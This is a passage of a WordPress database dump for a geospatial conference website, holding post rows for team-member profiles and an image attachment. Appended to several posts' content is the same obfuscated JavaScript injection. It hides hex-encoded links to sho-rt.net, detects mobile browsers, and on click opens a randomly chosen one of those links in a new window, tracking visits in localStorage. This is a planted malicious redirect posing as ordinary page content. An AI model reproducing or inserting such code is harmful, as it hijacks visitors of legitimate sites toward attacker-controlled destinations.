_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:31:27','2022-10-07 21:31:27','',2586,'https://gsw2023.com/?p=2598',0,'revision','',0),
(2599,1,'2022-10-07 21:36:37','2022-10-07 21:36:37','<!-- wp:paragraph -->\n<p>China University of Geosciences, China</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(WG IV/8)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Zhizhong Kang','','publish','closed','closed','','zhizhong-kang','','','2023-03-30 06:11:40','2023-03-30 06:11:40','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2599',0,'dt_team','',0),
(2600,1,'2022-10-07 21:36:19','2022-10-07 21:36:19','','1','','inherit','open','closed','','1-9','','','2022-10-07 21:36:19','2022-10-07 21:36:19','',2599,'https://gsw2023.com/wp-content/uploads/2022/10/1-8.jpg',0,'attachment','image/jpeg',0),
(2601,1,'2022-10-07 21:37:54','2022-10-07 21:37:54','<!-- wp:paragraph -->\n<p>Université Laval, Canada</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> (WG IV/8)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 